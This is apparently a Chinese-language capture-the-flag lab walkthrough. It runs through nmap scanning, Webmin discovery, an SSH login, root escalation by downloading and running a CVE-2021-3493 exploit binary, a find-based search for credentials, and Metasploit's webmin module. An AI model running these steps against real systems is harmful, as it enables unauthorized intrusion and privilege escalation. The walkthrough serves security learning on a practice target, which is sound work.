目錄

一、nmap掃存活主機

二、服務版本探測

三、信息收集

四、內部系統信息泄露

 五、ssh連接

 六、0day提權

1.上傳編譯執行

七、正常提權

1. firefox

2. 查找cubes相關文件

3.su成cubes

 4.find搜索

5.登錄webmin後臺

八、msf

一、nmap掃存活主機

1.半開掃描

nmap -sS ip

2.全開掃描

nmap -sT ip

3.基於ping的掃描

nmap -sP ip

4.基於arp的掃描

nmap -PR ip

5.無ping掃描

nmap -PN 192.168.152.130

二、服務版本探測

22，80還是常用的兩個服務，10000端口開放了webmin

Webmin是功能最强大的基於Web的Unix系統管理工具。管理員通過瀏覽器訪問Webmin的各種管理功能並完成相應的管理動作。Webmin支持絕大多數的Unix系統，這些系統除了各種版本的linux以外還包括：AIX、HPUX、Solaris、Unixware、Irix和FreeBSD等。

三、信息收集

 80端口沒有對我們突破邊界有用的信息

但是在10000端口我們找到了一個webmin的登錄框

1.webmin的登錄框

2.robots.txt文件

 3.嘗試解密

we scan php codes with rips

4.rips

 RIPS 是一款不錯的靜態源代碼分析工具，主要用來挖掘 PHP 程序的漏洞。而且是一款web界面的，訪問rips開始使用。嘗試去訪問。

最終在80端口下我們看到了這個rips

四、內部系統信息泄露

 五、ssh連接

這裏嘗試登錄webmin後臺結果不行。嘗試利用ssh登錄成功，

 六、0day提權

由於在這個靶機發布之後，unbuntu出現了一個提權漏洞。所以我們可以直接利用。

漏洞編號：cve-2021-3493

1.上傳編譯執行

目標主機無編譯環境，提前編譯

gcc exploit.c -o exp

開啟http服務

python3 -m http.server 80

下載

wget http://192.168.0.106/exp

給權

chmod 777 exp

執行

./exp

七、正常提權

1. firefox

又看到了一個火狐瀏覽器，鼓搗鼓搗沒啥用。

2. 查找cubes相關文件

find / -user cubes -type f -exec ls -al {} \;  2>/dev/null

這條命令的{}是用來接收結果的

這個是用來轉義;的

 經過搜索，拿到了一個密碼，猜測是cubes的

3.su成cubes

 4.find搜索

查找和cubes相關的，並且過濾掉沒用的

 find / -user cubes -type f -exec ls -al {} \;  2>/dev/null |grep -v "proc"

在日志文件中我們發現了admin賬號密碼

5.登錄webmin後臺

因為我們拿到的是管理員的賬號密碼，又因為webmin是控制linux終端的web‘應用’，所以登錄後已經拿到了最高權限。

八、msf

只是來熟悉一下用法，因為msf的rce模塊也需要賬號密碼，但是有賬號密碼我們可以直接拿到管理員權限

msfconsole

search webmin

use 2

show options

設置好各個參數即可

這裏也要設置

set ssl true